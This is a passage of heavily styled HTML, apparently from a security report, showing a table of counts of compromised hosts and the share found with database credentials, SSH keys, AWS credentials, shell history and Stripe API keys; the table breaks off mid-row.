0px; padding: 8px; user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW181986150 BCX0" xml:lang="EN-US" lang="EN-US" paraid="332775885" paraeid="{e24eefab-d52d-47ff-bc4d-71e5efd63095}{112}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; font-kerning: none; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun MacChromeBold SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; -webkit-font-smoothing: antialiased; font-variant-ligatures: none !important; font-size: 12pt; font-style: normal; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: bold;"><span class="NormalTextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text;">Metric</span></span><span class="EOP SCXW181986150 BCX0" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;335551550&quot;:1,&quot;335551620&quot;:3,&quot;335559738&quot;:0,&quot;335559739&quot;:0}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-size: 12pt; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif;">&#xA0;</span></p></div></div></td><td class="FirstRow LastCol SCXW181986150 BCX0" role="columnheader" data-celllook="4369" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; vertical-align: middle; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 165px;"><div class="TableCellContent SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 8px; user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW181986150 BCX0" xml:lang="EN-US" lang="EN-US" paraid="508205135" paraeid="{e24eefab-d52d-47ff-bc4d-71e5efd63095}{120}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; font-kerning: none; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun MacChromeBold SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; -webkit-font-smoothing: antialiased; font-variant-ligatures: none !important; font-size: 12pt; font-style: normal; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: bold;"><span class="NormalTextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text;">Count</span></span><span class="EOP SCXW181986150 BCX0" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;335551550&quot;:1,&quot;335551620&quot;:2,&quot;335559738&quot;:0,&quot;335559739&quot;:0}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-size: 12pt; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW181986150 BCX0" role="row" aria-rowindex="2" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; height: 20px;"><td class="FirstCol SCXW181986150 BCX0" role="rowheader" data-celllook="4369" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; vertical-align: middle; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 271px;"><div class="TableCellContent SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 8px; user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW181986150 BCX0" xml:lang="EN-US" lang="EN-US" paraid="1109791732" paraeid="{e24eefab-d52d-47ff-bc4d-71e5efd63095}{128}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; font-kerning: none; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-variant-ligatures: none !important; font-size: 12pt; font-style: normal; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: normal;"><span class="NormalTextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text;">Compromised hosts</span></span><span class="EOP SCXW181986150 BCX0" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;335551550&quot;:1,&quot;335551620&quot;:3,&quot;335559738&quot;:0,&quot;335559739&quot;:0}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-size: 12pt; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW181986150 BCX0" data-celllook="4369" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; vertical-align: middle; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 165px;"><div class="TableCellContent SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 8px; user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW181986150 BCX0" xml:lang="EN-US" lang="EN-US" paraid="825048021" paraeid="{e24eefab-d52d-47ff-bc4d-71e5efd63095}{136}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; font-kerning: none; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-variant-ligatures: none !important; font-size: 12pt; font-style: normal; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: normal;"><span class="NormalTextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text;">766</span></span><span class="EOP SCXW181986150 BCX0" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:0,&quot;335559739&quot;:0}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-size: 12pt; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW181986150 BCX0" role="row" aria-rowindex="3" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; height: 20px;"><td class="FirstCol SCXW181986150 BCX0" role="rowheader" data-celllook="4369" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; vertical-align: middle; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 271px;"><div class="TableCellContent SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 8px; user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW181986150 BCX0" xml:lang="EN-US" lang="EN-US" paraid="814771653" paraeid="{e24eefab-d52d-47ff-bc4d-71e5efd63095}{160}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; font-kerning: none; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-variant-ligatures: none !important; font-size: 12pt; font-style: normal; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: normal;"><span class="NormalTextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text;">Hosts with database credentials</span></span><span class="EOP SCXW181986150 BCX0" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;335551550&quot;:1,&quot;335551620&quot;:3,&quot;335559738&quot;:0,&quot;335559739&quot;:0}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-size: 12pt; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW181986150 BCX0" data-celllook="4369" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; vertical-align: middle; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 165px;"><div class="TableCellContent SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 8px; user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW181986150 BCX0" xml:lang="EN-US" lang="EN-US" paraid="358755293" paraeid="{e24eefab-d52d-47ff-bc4d-71e5efd63095}{168}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; font-kerning: none; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-variant-ligatures: none !important; font-size: 12pt; font-style: normal; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: normal;"><span class="NormalTextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text;">~701 (91.5%)</span></span><span class="EOP SCXW181986150 BCX0" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:0,&quot;335559739&quot;:0}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-size: 12pt; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW181986150 BCX0" role="row" aria-rowindex="4" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; height: 20px;"><td class="FirstCol SCXW181986150 BCX0" role="rowheader" data-celllook="4369" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; vertical-align: middle; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 271px;"><div class="TableCellContent SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 8px; user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW181986150 BCX0" xml:lang="EN-US" lang="EN-US" paraid="298065393" paraeid="{e24eefab-d52d-47ff-bc4d-71e5efd63095}{176}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; font-kerning: none; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-variant-ligatures: none !important; font-size: 12pt; font-style: normal; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: normal;"><span class="NormalTextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text;">Hosts with SSH private keys</span></span><span class="EOP SCXW181986150 BCX0" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;335551550&quot;:1,&quot;335551620&quot;:3,&quot;335559738&quot;:0,&quot;335559739&quot;:0}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-size: 12pt; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW181986150 BCX0" data-celllook="4369" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; vertical-align: middle; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 165px;"><div class="TableCellContent SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 8px; user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW181986150 BCX0" xml:lang="EN-US" lang="EN-US" paraid="1063609982" paraeid="{e24eefab-d52d-47ff-bc4d-71e5efd63095}{184}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; font-kerning: none; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-variant-ligatures: none !important; font-size: 12pt; font-style: normal; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: normal;"><span class="NormalTextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text;">~599 (78.2%)</span></span><span class="EOP SCXW181986150 BCX0" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:0,&quot;335559739&quot;:0}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-size: 12pt; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW181986150 BCX0" role="row" aria-rowindex="5" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; height: 20px;"><td class="FirstCol SCXW181986150 BCX0" role="rowheader" data-celllook="4369" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; vertical-align: middle; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 271px;"><div class="TableCellContent SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 8px; user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW181986150 BCX0" xml:lang="EN-US" lang="EN-US" paraid="510440470" paraeid="{e24eefab-d52d-47ff-bc4d-71e5efd63095}{192}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; font-kerning: none; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-variant-ligatures: none !important; font-size: 12pt; font-style: normal; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: normal;"><span class="NormalTextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text;">Hosts with AWS credentials</span></span><span class="EOP SCXW181986150 BCX0" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;335551550&quot;:1,&quot;335551620&quot;:3,&quot;335559738&quot;:0,&quot;335559739&quot;:0}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-size: 12pt; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW181986150 BCX0" data-celllook="4369" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; vertical-align: middle; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 165px;"><div class="TableCellContent SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 8px; user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW181986150 BCX0" xml:lang="EN-US" lang="EN-US" paraid="399729853" paraeid="{e24eefab-d52d-47ff-bc4d-71e5efd63095}{200}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; font-kerning: none; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-variant-ligatures: none !important; font-size: 12pt; font-style: normal; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: normal;"><span class="NormalTextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text;">~196 (25.6%)</span></span><span class="EOP SCXW181986150 BCX0" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:0,&quot;335559739&quot;:0}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-size: 12pt; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW181986150 BCX0" role="row" aria-rowindex="6" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; height: 20px;"><td class="FirstCol SCXW181986150 BCX0" role="rowheader" data-celllook="4369" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; vertical-align: middle; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 271px;"><div class="TableCellContent SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 8px; user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW181986150 BCX0" xml:lang="EN-US" lang="EN-US" paraid="108606549" paraeid="{e24eefab-d52d-47ff-bc4d-71e5efd63095}{208}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; font-kerning: none; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-variant-ligatures: none !important; font-size: 12pt; font-style: normal; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: normal;"><span class="NormalTextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text;">Hosts with shell command history</span></span><span class="EOP SCXW181986150 BCX0" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;335551550&quot;:1,&quot;335551620&quot;:3,&quot;335559738&quot;:0,&quot;335559739&quot;:0}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-size: 12pt; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW181986150 BCX0" data-celllook="4369" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; vertical-align: middle; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 165px;"><div class="TableCellContent SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 8px; user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW181986150 BCX0" xml:lang="EN-US" lang="EN-US" paraid="1967950419" paraeid="{e24eefab-d52d-47ff-bc4d-71e5efd63095}{216}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; font-kerning: none; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-variant-ligatures: none !important; font-size: 12pt; font-style: normal; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: normal;"><span class="NormalTextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text;">~245 (32.0%)</span></span><span class="EOP SCXW181986150 BCX0" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:0,&quot;335559739&quot;:0}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-size: 12pt; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW181986150 BCX0" role="row" aria-rowindex="7" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; height: 20px;"><td class="FirstCol SCXW181986150 BCX0" role="rowheader" data-celllook="4369" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; vertical-align: middle; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 271px;"><div class="TableCellContent SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 8px; user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW181986150 BCX0" xml:lang="EN-US" lang="EN-US" paraid="1865914896" paraeid="{e24eefab-d52d-47ff-bc4d-71e5efd63095}{224}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; font-kerning: none; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-variant-ligatures: none !important; font-size: 12pt; font-style: normal; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: normal;"><span class="NormalTextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text;">Hosts with live Stripe API keys</span></span><span class="EOP SCXW181986150 BCX0" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;335551550&quot;:1,&quot;335551620&quot;:3,&quot;335559738&quot;:0,&quot;335559739&quot;:0}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-size: 12pt; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW181986150 BCX0" data-celllook="4369" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; vertical-align: middle; position: relative; background-color: transparent; background-clip: padding-box; border: 1px 